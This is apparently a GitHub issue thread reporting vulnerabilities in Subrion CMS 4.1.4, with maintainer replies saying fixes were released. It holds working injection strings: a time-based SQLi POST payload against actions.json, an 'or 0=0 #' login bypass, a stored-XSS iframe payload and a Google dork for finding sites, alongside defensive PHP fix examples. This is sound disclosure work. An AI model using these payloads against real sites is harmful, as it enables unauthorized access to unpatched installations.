Subrion cms 4.1.4 sql injection in /front/actions.php #480

Closed
jgj212 opened this issue Jul 2, 2017 · 4 comments
Comments

@jgj212

jgj212 commented Jul 2, 2017

Subrion CMS 4.1.4 SQL injection in /front/actions.php

Description

Subrion CMS 4.1.4 has a SQL injection because $_POST values are not checked.

Details

Critical code in /front/actions.php: $_POST is passed to deleteUploadedFile with no checking.

        case 'delete-file':
            if (!empty($_POST['item']) && !empty($_POST['itemid']) && !empty($_POST['field']) && !empty($_POST['file'])) {
                $output = $iaCore->factory('field')->deleteUploadedFile($_POST['field'], $_POST['item'], $_POST['itemid'], $_POST['file'], true)
                    ? ['error' => false, 'message' => iaLanguage::get('deleted')]
                    : ['error' => true, 'message' => iaLanguage::get('error')];
            }

            break;

deleteUploadedFile in /includes/classes/ia.core.field.php:

    public function deleteUploadedFile($fieldName, $itemName, $itemId, $fileName = null, $checkOwnership = false)
    {
        $tableName = $this->iaCore->factory('item')->getItemTable($itemName);

        if ($checkOwnership) {
            if (!iaUsers::hasIdentity()) {
                return false;
            }

            $memberIdColumn = (iaUsers::getItemName() == $itemName) ? iaDb::ID_COLUMN_SELECTION : 'member_id';
            $row = $this->iaDb->row([$memberIdColumn, $fieldName], iaDb::convertIds($itemId), $tableName);

            if (!$row || iaUsers::getIdentity()->id != $row[$memberIdColumn]) {
                return false;
            }

            $itemValue = $row[$fieldName];
        } else {
            $itemValue = $this->iaDb->one([$fieldName], iaDb::convertIds($itemId), $tableName);
        }

        //...more code...

        return false;
    }

There is a check, "checkOwnership": an anonymous user will be blocked with "return false", but any registered user will continue. So $fieldName will be passed to row(), and it comes from $_POST['field'].

The row() function's purpose is to construct the SQL statement and execute it with no checking:

    public function row($fields = self::ALL_COLUMNS_SELECTION, $condition = '', $tableName = null, $start = 0)
    {
        if (is_null($tableName)) {
            $result = $this->_get('row', $fields, $condition, $start, 1);
        } else {
            $this->setTable($tableName);
            $result = $this->_get('row', $fields, $condition, $start, 1);
            $this->resetTable();
        }

        return $result;
    }

    protected function _get($type, $fields, $condition = '', $start = 0, $limit = null)
    {
        $stmtFields = $fields;

        if (is_array($fields)) {
            $stmtFields = '';
            foreach ($fields as $key => $field) {
                $stmtFields .= is_int($key)
                    ? '`' . $field . '`'
                    : sprintf('%s `%s`', is_numeric($field) ? $field : '`' . $field . '`', $key);
                $stmtFields .= ', ';
            }
            $stmtFields = substr($stmtFields, 0, -2);
        }

        if ($condition) {
            $condition = ' WHERE ' . $condition;
        }
        if ($limit && stripos($condition, 'limit') === false) {
            $condition .= ' LIMIT ' . $start . ', ' . $limit;
        }

        $sql = 'SELECT ' . $stmtFields . ' FROM `' . $this->_table . '` ' . $condition;

        switch ($type) {
            case 'all':
                return $this->getAll($sql);
            case 'keyval':
                return $this->getKeyValue($sql);
            case 'assoc':
                return $this->getAssoc($sql, true);
            default:
                return $this->getRow($sql);
        }
    }

So there is a POST-based SQL injection. Because this SQL injection has no echo, we can use time-based SQL injection to test it with a normal user account.

sleep(0)

url: http://localhost/subrion/actions.json
postdata: action=delete-file&item=members&itemid=1&field=email or sleep(0) ,username&file=123
time-echo:
time1

sleep(3)

url: http://localhost/subrion/actions.json
postdata: action=delete-file&item=members&itemid=1&field=email or sleep(3) ,username&file=123
time-echo:
time3

Credit: ADLab of VenusTech
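The root cause in the report is that iaDb::_get backtick-quotes whatever string it receives as a field name without checking that the string is an identifier, so a value such as `email or sleep(3) ,username` becomes part of the SELECT. The following is an added example, not code from the Subrion project or from the reporter: a small select builder that validates every field, alias and table name against the character set of a plain MySQL identifier before quoting it. The class and method names and the `sub_members` table are assumptions for the demo; the field-list handling deliberately mirrors the shape of `_get` shown above so the difference is only the validation step.

```php
<?php
// Added example (not Subrion's code): build a SELECT with identifier validation.
// Class, method and table names are assumed; the loop mirrors iaDb::_get on the page.

final class SafeSelectBuilder
{
    // A plain MySQL identifier: letters, digits, underscore, at most 64 characters.
    private const IDENTIFIER = '/^[A-Za-z0-9_]{1,64}$/';

    /** Throws if $name is not a bare identifier; otherwise returns it backtick-quoted. */
    public static function quoteIdentifier(string $name): string
    {
        if (!preg_match(self::IDENTIFIER, $name)) {
            throw new InvalidArgumentException('Rejected SQL identifier: ' . $name);
        }
        return '`' . $name . '`';
    }

    /**
     * Same field-list shapes as iaDb::_get (plain name, or "expr `alias`" keyed by alias),
     * but every name passes through quoteIdentifier() instead of being concatenated as-is.
     * $condition is expected to carry placeholders only (e.g. "`id` = ?"), never user data.
     */
    public static function build(array $fields, string $table, string $condition = ''): string
    {
        $parts = [];
        foreach ($fields as $key => $field) {
            if (is_int($key)) {
                $parts[] = self::quoteIdentifier($field);
            } else {
                // Alias form: a numeric literal is allowed as the expression, as in the original.
                $expr = is_numeric($field) ? (string)$field : self::quoteIdentifier($field);
                $parts[] = $expr . ' ' . self::quoteIdentifier($key);
            }
        }
        $sql = 'SELECT ' . implode(', ', $parts) . ' FROM ' . self::quoteIdentifier($table);
        if ($condition !== '') {
            $sql .= ' WHERE ' . $condition;
        }
        return $sql;
    }
}

// Constructed inputs with the same shapes as the report's requests.
$benign  = ['id', 'email'];
$payload = ['id', 'email or sleep(3) ,username'];   // the field value from the PoC above

echo SafeSelectBuilder::build($benign, 'sub_members', '`id` = ?'), PHP_EOL;

try {
    SafeSelectBuilder::build($payload, 'sub_members', '`id` = ?');
} catch (InvalidArgumentException $e) {
    echo 'Blocked: ', $e->getMessage(), PHP_EOL;
}
```

Where the set of legitimate field names is known (for Subrion, the fields defined for the item), an allowlist lookup against that set is stricter than a character-class check and is the better choice; the regex closes the injection either way, and rejecting with an exception rather than silently stripping characters keeps the failure visible in application logs.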

ghost pushed a commit that referenced this issue Jul 3, 2017
@ghost

ghost commented Jul 6, 2017

Hello @jgj212! Many thanks for the report.

Fix provided and the critical upgrade patch has been released. It's automatically installed on each script and provides this fix to the script.

@ghost ghost closed this as completed Jul 6, 2017
@vbezruchkin vbezruchkin added the bug label Jul 6, 2017
@vbezruchkin vbezruchkin modified the milestone: 4.1.6 Jul 6, 2017
@gesonchi

1. SUBRION CMS multiple vulnerabilities

vendor: www.subrion.com

Author: Karthik R (3psil0nLambDa)

Email: Karthik.cupid@gmail.com

My blog: epsilonlambda.co.cc

Google dork: © 2011 Powered by Subrion CMS

Description about the CMS

Subrion CMS unites the functionality of articles script, auto classifieds script, realty classifieds script, and web directory script all in one package. Subrion's highly scalable set of key features makes it a powerful platform for web sites.

Subrion CMS is easy to install and simple to manage. Use it as a stand-alone application or in conjunction with other applications to create entry level sites, mid-sized or large sites. You can be confident that you will be able to invest in this system and continue to grow it to any possible level.

  • SQLi Vulnerability

The attackers can use the authentication bypass to get into the admin panel in the site.

Exploit: Username: or 0=0 #
         Password: or 0=0 #

  • Persistent XSS vulnerability

The Poll module and Manage pages are vulnerable to persistent XSS in the title field.

Exploit: "><IFRAME SRC="javascript:alert(XSS);"></IFRAME>

  • Products like Auto Classifieds, Articles Script, Real estate script and Web directory run on the same CMS, and hence are vulnerable too.
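The two findings in the advisory above, a login that accepts `or 0=0 #` as username and password, and a title field rendered without escaping, have the same standard fixes: keep credentials out of the SQL text with a prepared statement and verify the password against a stored hash, and escape stored titles for HTML context on output. The following is an added example, not Subrion's code or the advisory author's. It uses an in-memory SQLite database with one constructed user so it runs offline (it needs the pdo_sqlite extension); the `users` table and column names are assumptions.

```php
<?php
// Added example, not Subrion's code. Table and column names are assumed.

// Constructed fixture: one user with a properly hashed password.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password_hash TEXT)');
$ins = $db->prepare('INSERT INTO users (username, password_hash) VALUES (?, ?)');
$ins->execute(['alice', password_hash('correct horse battery staple', PASSWORD_DEFAULT)]);

/**
 * Returns the user id on success, null otherwise.
 * Neither credential reaches the SQL text: the username is bound as a
 * parameter and the password is compared against the stored hash in PHP,
 * so "or 0=0 #" is just a username that does not exist.
 */
function login(PDO $db, string $username, string $password): ?int
{
    $stmt = $db->prepare('SELECT id, password_hash FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;
    }
    return password_verify($password, $row['password_hash']) ? (int)$row['id'] : null;
}

/** Escape a stored title for HTML context so markup in it is displayed, not executed. */
function renderTitle(string $title): string
{
    return '<h1>' . htmlspecialchars($title, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</h1>';
}

// The advisory's bypass strings against the parameterized login (constructed input).
var_dump(login($db, 'alice', 'correct horse battery staple'));
var_dump(login($db, "' or 0=0 #", "' or 0=0 #"));

// The advisory's XSS string, rendered inert.
echo renderTitle('"><IFRAME SRC="javascript:alert(XSS);"></IFRAME>'), PHP_EOL;
```

The first `var_dump` reports the user's id and the second reports null; the echoed title contains only entity-encoded quotes and angle brackets, so the browser shows the string as text. Escaping at output time rather than at storage time is what makes the persistent variant safe regardless of how the title got into the database.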

@attritionorg

@Batry, did you see @gesonchi's follow-up with more vulns?

@vbezruchkin (Member)

All these reports have been fixed and released in our latest version. So there are no known issues in our Subrion 4.1.5.20 version.

Thanks

This issue was closed.